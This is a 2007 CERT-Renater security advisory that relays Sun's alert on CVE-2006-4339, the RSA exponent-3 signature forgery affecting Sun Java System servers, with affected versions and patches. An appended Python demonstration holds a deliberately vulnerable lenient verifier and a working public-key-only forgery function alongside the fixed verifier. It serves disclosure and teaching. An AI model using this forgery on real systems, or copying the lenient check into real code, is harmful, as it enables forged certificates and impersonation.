=====================================================================
CERT-Renater Information Note No. 2007/VULN129
_____________________________________________________________________

DATE                 : 20/03/2007
HARDWARE PLATFORM(S) : /
OPERATING SYSTEM(S)  : Systems running Sun Java System Application Server,
                       Sun Java System Proxy Server, Sun Java System Web Server.
======================================================================

Sun(sm) Alert Notification

 * Sun Alert ID: 102696
 * Synopsis: A Security Vulnerability in RSA Signature Verification Affects
   Sun Java System Application Server, Proxy Server and Web Server
 * Category: Security
 * Product: Sun Java System Application Server Standard Edition 7 2004Q2,
   Sun Java System Application Server Platform Edition 8.1 2005Q1,
   Sun Java System Web Proxy Server 4.0, Sun Java System Web Server 6.1,
   Sun Java System Application Server Enterprise Edition 7 2004Q2,
   Sun Java System Application Server Enterprise Edition 8.1 2005Q1,
   Sun ONE Web Server 6.0, Sun Java System Web Proxy Server 3.6
 * BugIDs: 6472033, 6473494
 * Avoidance: Patch
 * State: Workaround
 * Date Released: 03-Nov-2006
 * Date Closed:
 * Date Modified: 08-Nov-2006, 21-Nov-2006, 10-Mar-2007

1. Impact

Sun Java System Application Server, Sun Java System Proxy Server and Sun Java
System Web Server are vulnerable to an RSA signature verification flaw which
may allow remote unprivileged users to construct certificates with forged
signatures that go undetected and are accepted as valid.

The underlying weakness (CVE-2006-4339) is in PKCS #1 v1.5 signature
verification: the check does not confirm that the hash's DigestInfo structure
ends exactly at the end of the padded block, so trailing bytes after it are
ignored. When the signing key uses the public exponent 3, this lets an attacker
compute, from the public key alone, a value whose cube has the expected padding
and hash in its leading bytes and arbitrary garbage after them, which the
lenient check accepts. The flaw is on the verifying side, so any certificate
these products validate whose issuer key has exponent 3 is exposed.

This issue is also described in the following documents:

    CERT VU#845620 at http://www.kb.cert.org/vuls/id/845620
    CVE-2006-4339 at http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339

2. Contributing Factors

This issue can occur in the following releases:

SPARC Platform
 * Sun ONE Application Server 7
 * Sun Java System Application Server 7 2004Q2
 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 without
   (file-based) patch 119169-12 or (SVR4) patch 119166-20
 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 without
   (file-based) patch 119173-12 or (SVR4) patch 119166-20
 * Sun ONE Web Proxy Server 3.6
 * Sun Java System Proxy Server 4.0
 * Sun Java System Web Server 6.0 without Service Pack 11
 * Sun Java System Web Server 6.1 without Service Pack 7

x86 Platform
 * Sun ONE Application Server 7
 * Sun Java System Application Server 7 2004Q2
 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 without
   (file-based) patch 119170-12 or (SVR4) patch 119167-20
 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 without
   (file-based) patch 119174-12 or (SVR4) patch 119167-20
 * Sun Java System Proxy Server 4.0
 * Sun Java System Web Server 6.1 without Service Pack 7

Linux Platform
 * Sun ONE Application Server 7
 * Sun Java System Application Server 7 2004Q2
 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 without
   (file-based) patch 119171-12 or RHEL2.1/RHEL3.0 (Pkg_patch) 119168-20
 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 without
   (file-based) patch 119175-12 or RHEL2.1/RHEL3.0 (Pkg_patch) 119168-20
 * Sun Java System Proxy Server 4.0
 * Sun Java System Web Server 6.0 without Service Pack 11
 * Sun Java System Web Server 6.1 without Service Pack 7

AIX Platform
 * Sun ONE Web Proxy Server 3.6
 * Sun Java System Web Server 6.0 without Service Pack 11
 * Sun Java System Web Server 6.1 without Service Pack 7

HP-UX Platform
 * Sun ONE Web Proxy Server 3.6
 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1
 * Sun Java System Web Server 6.0 without Service Pack 11
 * Sun Java System Web Server 6.1 without Service Pack 7

Windows Platform
 * Sun ONE Application Server 7
 * Sun Java System Application Server 7 2004Q2
 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 without
   (file-based) patch 119172-12
 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 without
   (file-based) patch 119176-12
 * Sun ONE Web Proxy Server 3.6
 * Sun Java System Proxy Server 4.0
 * Sun Java System Web Server 6.0 without Service Pack 11
 * Sun Java System Web Server 6.1 without Service Pack 7

To determine the version of Sun Java System Application Server on a system,
the following command can be run:

    $ <install_dir>/bin/asadmin version --verbose
    Sun Java System Application Server 7 2004Q2UR3 (build A051525-273129)

(Where <install_dir> is the installation directory of the Application Server.)

To determine the version of Sun Java System Web Server on a system, the
following command can be run:

    $ <server_root>/https-<hostname>/start -version

(Where <server_root> is the top installation directory of the Web Server and
<hostname> is the actual host name on which the Web Server is installed.)

To determine the version of Sun Java System Proxy Server on a system, the
following command can be run:

    $ <install_dir>/bin/ns-proxy -v
    Sun ONE Web Proxy Server 3.6-SP9 B2006.191.1801 SP9

(Where <install_dir> is the installation directory of the Proxy Server.)

3. Symptoms

There are no predictable symptoms that would indicate the described issue has
occurred.

4. Relief/Workaround

There is no workaround for this issue. Please see the Resolution section below.

5. Resolution

This issue is addressed in the following releases:

SPARC Platform
 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 with
   (file-based) patch 119169-12 or later or (SVR4) patch 119166-20 or later
 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 with
   (file-based) patch 119173-12 or later or (SVR4) patch 119166-20 or later
 * Sun Java System Web Server 6.0 with Service Pack 11 or later
 * Sun Java System Web Server 6.1 with Service Pack 7 or later

x86 Platform
 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 with
   (file-based) patch 119170-12 or later or (SVR4) patch 119167-20 or later
 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 with
   (file-based) patch 119174-12 or later or (SVR4) patch 119167-20 or later
 * Sun Java System Web Server 6.1 with Service Pack 7 or later

Linux Platform
 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 with
   (file-based) patch 119171-12 or later or RHEL2.1/RHEL3.0 (Pkg_patch)
   119168-20 or later
 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 with
   (file-based) patch 119175-12 or later or RHEL2.1/RHEL3.0 (Pkg_patch)
   119168-20 or later
 * Sun Java System Web Server 6.0 with Service Pack 11 or later
 * Sun Java System Web Server 6.1 with Service Pack 7 or later

AIX Platform
 * Sun Java System Web Server 6.0 with Service Pack 11 or later
 * Sun Java System Web Server 6.1 with Service Pack 7 or later

HP-UX Platform
 * Sun Java System Web Server 6.0 with Service Pack 11 or later
 * Sun Java System Web Server 6.1 with Service Pack 7 or later

Windows Platform
 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 with
   (file-based) patch 119172-12 or later
 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 with
   (file-based) patch 119176-12 or later
 * Sun Java System Web Server 6.0 with Service Pack 11 or later
 * Sun Java System Web Server 6.1 with Service Pack 7 or later

Sun Java System Web Server 6.0 Service Pack 11 is available at:

    http://www.sun.com/download/products.xml?id=459db7b2

Sun Java System Web Server 6.1 Service Pack 7 is available at:

    http://www.sun.com/download/products.xml?id=45c90ca9

Note that no fixed release is listed above for Sun ONE Application Server 7,
Sun Java System Application Server 7 2004Q2, Sun ONE Web Proxy Server 3.6 or
Sun Java System Proxy Server 4.0, although all of them appear in the
Contributing Factors section; for these products a final resolution is pending
completion.

Change History

08-Nov-2006:
 * Updated Contributing Factors section

21-Nov-2006:
 * Updated Contributing Factors and Resolution sections

10-Mar-2007:
 * Updated Contributing Factors and Resolution sections

This Sun Alert notification is being provided to you on an "AS IS" basis. This
Sun Alert notification may contain information provided by third parties. The
issues described in this Sun Alert notification may or may not impact your
system(s). Sun makes no representations, warranties, or guarantees as to the
information contained herein. ANY AND ALL WARRANTIES, EXPRESS OR IMPLIED,
INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
PARTICULAR PURPOSE, OR NON-INFRINGEMENT, ARE HEREBY DISCLAIMED. BY ACCESSING
THIS DOCUMENT YOU ACKNOWLEDGE THAT SUN SHALL IN NO EVENT BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES THAT ARISE OUT
OF YOUR USE OR FAILURE TO USE THE INFORMATION CONTAINED HEREIN.

This Sun Alert notification contains Sun proprietary and confidential
information. It is being provided to you pursuant to the provisions of your
agreement to purchase services from Sun, or, if you do not have such an
agreement, the Sun.com Terms of Use. This Sun Alert notification may only be
used for the purposes contemplated by these agreements.

Copyright 2000-2006 Sun Microsystems, Inc., 4150 Network Circle, Santa Clara,
CA 95054 U.S.A. All rights reserved.

======================================================================
=========================================================
CERT-Renater reference servers
    http://www.urec.fr/securite
    http://www.cru.fr/securite
    http://www.renater.fr
=========================================================
+ CERT-RENATER          | tel  : 01-53-94-20-44     +
+ 151 bd de l'Hopital   | fax  : 01-53-94-20-41     +
+ 75013 Paris           | email: certsvp@renater.fr +
=========================================================
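The verification flaw described in section 1 of the alert, shown as an added example that is not part of the original note and is not Sun's, NSS's or OpenSSL's code. It builds a toy RSA key with public exponent 3, a "lenient" PKCS #1 v1.5 verifier of the kind CVE-2006-4339 describes (it stops checking once it has matched the DigestInfo), the strict verifier that compares the whole encoded block, and the public-key-only forgery. The key size (2048 bits), the SHA-256 DigestInfo, the random seed and the signed message are all constructed for the example; the forgery needs only the modulus and e = 3.

```python
# Lenient vs. strict PKCS #1 v1.5 verification and the e=3 forgery (CVE-2006-4339).
# Illustrative code written for this note: the toy key generator, the "lenient"
# verifier and the forgery are constructed here (not Sun's, NSS's or OpenSSL's code).
import hashlib
import hmac
import random

E = 3                                # the small public exponent the attack relies on
RNG = random.Random(845620)          # seeded only so the example is reproducible
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")  # RFC 3447 9.2
SMALL_PRIMES = [p for p in range(3, 2000, 2) if all(p % q for q in range(3, int(p ** .5) + 1, 2))]

def is_probable_prime(n, rounds=20):
    # trial division, then Miller-Rabin (toy: not constant time)
    if n < 2 or n % 2 == 0:
        return n == 2
    if any(n % p == 0 for p in SMALL_PRIMES):
        return n in SMALL_PRIMES
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(RNG.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_key(bits=2048):
    """Toy RSA key with e = 3; primes are forced to p % 3 == 2 so gcd(e, phi) == 1."""
    primes = []
    while len(primes) < 2:
        c = RNG.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        if c % 3 == 2 and is_probable_prime(c):
            primes.append(c)
    p, q = primes
    return p * q, pow(E, -1, (p - 1) * (q - 1))      # (n, d); needs Python 3.8+

def emsa_pkcs1_v15(msg, k):
    """Correct encoding: 00 01 FF..FF 00 || DigestInfo(SHA-256(msg)), k bytes."""
    t = SHA256_PREFIX + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def rsa_public(sig, n):
    # s^e mod n as a k-byte block, or None for an out-of-range signature
    return pow(sig, E, n).to_bytes((n.bit_length() + 7) // 8, "big") if 0 < sig < n else None

def verify_lenient(msg, sig, n):
    """VULNERABLE (the bug class behind CVE-2006-4339): skip the FF padding,
    compare the DigestInfo where it starts, never look at what follows it."""
    em = rsa_public(sig, n)
    if em is None or em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= len(em) or em[i] != 0x00:       # >= 8 bytes of FF, then 00
        return False
    t = SHA256_PREFIX + hashlib.sha256(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t              # trailing bytes are ignored

def verify_strict(msg, sig, n):
    """FIXED: rebuild the whole expected block and compare every byte."""
    em = rsa_public(sig, n)
    return em is not None and hmac.compare_digest(em, emsa_pkcs1_v15(msg, len(em)))

def icbrt_ceil(x):
    # smallest integer s with s**3 >= x (exact binary search on big ints)
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 >= x:
            hi = mid
        else:
            lo = mid + 1
    return lo

def forge(msg, n):
    """Bleichenbacher (2006): needs only (n, e=3). Put the DigestInfo right after
    minimal padding, leave the low bytes free and take the ceiling cube root: its
    cube reproduces the prefix, with the rounding error (< 2**1358 for 2048-bit n)
    landing in the ~1550 free bits that the lenient verifier never inspects."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + SHA256_PREFIX + hashlib.sha256(msg).digest()
    s = icbrt_ceil(int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big"))
    assert s ** 3 < n                 # no reduction mod n, so s**3 mod n == s**3
    return s

def demo(msg=b"constructed certificate body: CN=forged.example"):
    n, d = gen_key()                                   # a few seconds in pure Python
    genuine = pow(int.from_bytes(emsa_pkcs1_v15(msg, (n.bit_length() + 7) // 8), "big"), d, n)
    forged = forge(msg, n)
    return {"genuine_strict": verify_strict(msg, genuine, n),
            "genuine_lenient": verify_lenient(msg, genuine, n),
            "forged_strict": verify_strict(msg, forged, n),
            "forged_lenient": verify_lenient(msg, forged, n)}

if __name__ == "__main__":
    print(demo())   # {'genuine_strict': True, 'genuine_lenient': True,
                    #  'forged_strict': False, 'forged_lenient': True}
```

Run with `python3 forge_demo.py` (file name assumed). The genuine signature passes both verifiers; the forged value passes only the lenient one, although nobody ever held the private key. The fix is the one in verify_strict: recompute the full encoded block and compare all k bytes, rather than parsing the padding and stopping at the hash. Until the patches above are applied, it is worth knowing which trusted CA keys in the servers' certificate databases use exponent 3 (`openssl x509 -in ca.pem -noout -text | grep Exponent`), since only signatures under such keys can be forged this way.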